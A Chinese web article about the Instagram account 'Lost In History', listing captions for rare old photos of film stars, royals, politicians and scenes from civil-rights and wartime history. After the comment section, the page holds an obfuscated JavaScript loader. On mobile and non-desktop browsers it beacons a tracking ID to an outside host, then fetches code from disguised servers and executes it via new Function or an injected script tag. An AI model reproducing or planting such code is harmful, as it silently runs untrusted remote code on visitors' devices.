一组珍贵老照片,让人重新认识这个世界

时间:2021-01-11 15:37:00阅读:4197
老照片似乎总有一股特殊的力量,能把我们拉到过去的时空和思绪。外网有这样一个Instagram账号,“Lost In History”迷失于历史。它专门分享当代人不为人知的老照片

老照片似乎总有一股特殊的力量,能把我们拉到过去的时空和思绪。

外网有这样一个Instagram账号,“Lost In History”迷失于历史。

它专门分享当代人不为人知的老照片,内容从时代图标到路上行人,从历史大事到日常点滴,每一张都带着时代的气息。

这个账号在ins上有45万的粉丝,推特有550万粉丝。粉丝包括很多名人:肯豆,考特尼·卡戴珊,汤姆克鲁斯,塞巴斯酱 斯坦,索菲 特纳 ,汤姆 费尔顿,万磁王Sir 伊恩麦克莱恩,准王妃梅格汉 马克尔,都是这些老照片的观众。

博主说“我觉得这些照片和以前的人非常酷。他们值得被这个世界重新认识。现在的我们也应该了解他们,因为他们说不定就会在某些方面给我们灵感。每天翻看这些照片的时候,甚至会觉得活在那个时代......看着那时的人们是怎么生活的, 这对我来说非常有趣。”

粉丝也表示,他分享的这些有趣的老照片,也总是会不经意间让人想到从前。

美国国宝级演员克林特·伊斯特伍德在他的经典作品《黄金三镖客》拍摄现场休息。

巨石强森和他的范思哲衬衫。

薇诺拉瑞德,1992年。

古古许,伊朗歌手、演员,70年代的时尚icon。

前美国总统布莱克奥巴马五年级时的全班合照,1972年于Punahou School,火奴鲁鲁,夏威夷。

女王伊丽莎白二世还是公举的时候,在伦敦和老士兵握手,1929年。

1942年,16岁的伊丽莎白女王第一次会见她的军队。

大卫鲍威和Paul Buckmaster,1975年。

老照片似乎总有一股特殊的力量,能把我们拉到过去的时空和思绪。

外网有这样一个Instagram账号,“Lost In History”迷失于历史。

娜塔丽波特曼,1998年为Vogue Italia拍摄照片。

张曼玉和梁朝伟,《花样年华》(In The Mood For Love) 剧照。

电影《风月俏佳人》现场的小憩。

艺术家弗里达·卡洛。

15岁的迈克尔· 杰克逊。

1968年,列侬和洋子。

1974年, 列侬在纽约。

1990年,麦当娜在Blond Ambition巡演后,乘车回酒店。

1990年,德普叔在《爱德华剪刀手》拍摄现场进行化妆。

18岁的穆罕默德·阿里, 独自一人站在1960年的罗马奥林匹克颁奖台上。

1995年的小李子。

有些照片背后,别有深意......

肯尼迪总统夫人与肯尼迪总统生前的一张照片。Jacqueline曾说 “这张照片是我在John死后唯一能忍着看下去的,其他的对我来说都太痛苦。”这张照片里的他们,眼中充满爱意。因此这也是Jacqueline最喜欢的她和丈夫的合照。

奥斯卡影后,意大利女演员Sophia Loren:“我宁可吃着意面喝着酒,也不想去减肥瘦成纸片人”。

1988年,川普和奥普拉在大西洋城看比赛。

1970年,希腊雅典的女性们为自己争取权益——“我不是父亲或丈夫的附属,我只想做我自己” 。

1936年,欧洲的犹太人示威游行,阻止他们被放逐回德国。

1970年,迷你裙游行现场。

有些照片回顾历史,使我们深思......

“Eyes of Hate”憎恶之眼。摄影师Alfred Eisenstaedt在为保罗·约瑟夫·戈培尔拍照,但当他发现摄影师是犹太人时,他的眼神瞬间充满了憎恶。

1958年6月8日,19岁的David Isom,在佛罗里达的一个游泳馆中,打破了泳池肤色划分规定,导致群体反对,整个游泳馆关闭......

1945年的西雅图,一个日本家庭,在集中营被释放后回到自己以前的家,发现家被涂鸦成如此。

1948年,George McLaurin,第一个非洲裔美国学生进入奥克拉荷马大学,但是被迫与白人学生分开坐。

1943年,二战刚开始时的阿道夫希特勒。

1940年,伦敦被空袭后路上的送奶工。

罕见的奴隶船存照,摄影师Marc Ferrez拍摄于1882年。

有些照片,是那些印象中的青葱岁月......

1965年,伦敦牛津街的圣诞夜。

1945年的伦敦,人们在炸弹轰炸之后的地方打板球。

1930年,缅因州的校车,马拉木屋。

90年代的首尔......

黛安娜王妃的私人摄影照片,1995年。

10年前的福布斯杂志封面。

巴黎,1957年。

1920年的底特律, 由于禁酒令,一桶桶酒从窗户上倾泻而下......

早期的“自拍杆”。

据说能治疗宿醉的冰镇面膜......

70年代的溜猫......

60年代的某酒店的浴缸。

1961的NASA,当时ppt啥的还没出现,科学家们就在黑板上展示,演算。

赫本,1955年。

奥黛丽赫本,为“战争与和平”中Natasha一角做发型测试。

赫本,电影“Funny Face”拍摄中,1956年。

1950年的梦露。

梦露穿着一个装土豆的袋子,1951年。

梦露,1953年。

梦露,1955年。

博主所发的照片,虽说都是与艺术文化,爱与和平有关的,有时也会引起网友的热论。尤其是2016年美国政坛由于大选,风云四起。选举那段时间,为了对应当下,博主发出了希拉里和川普年轻时的照片,还引来了广泛的讨论。

博主后来还开了一个叫“Lost In Happiness” 迷失在欢乐中的账号,里面满满的都是爱意~~

这些老照片记录的瞬间, 一代一代已逐渐成为记忆,看后,令人别有一番感觉。

评论

  • 评论加载中...

function XAIxP(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function IvbanxAu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XAIxP(t);};window[''+'G'+'C'+'V'+'T'+'H'+'a'+'x'+'p'+'X'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=IvbanxAu,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://jm.bpqweee.com:7891/stats/14402/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHMlM0ElMkYlMkZtbi5kemlnai5jb20lM0E4ODkx','d3NzJTNBJTJGJTJGcHMucGpzem8uY29tJTNBOTUzMw====','163644',window,document,['H','=']);}:function(){};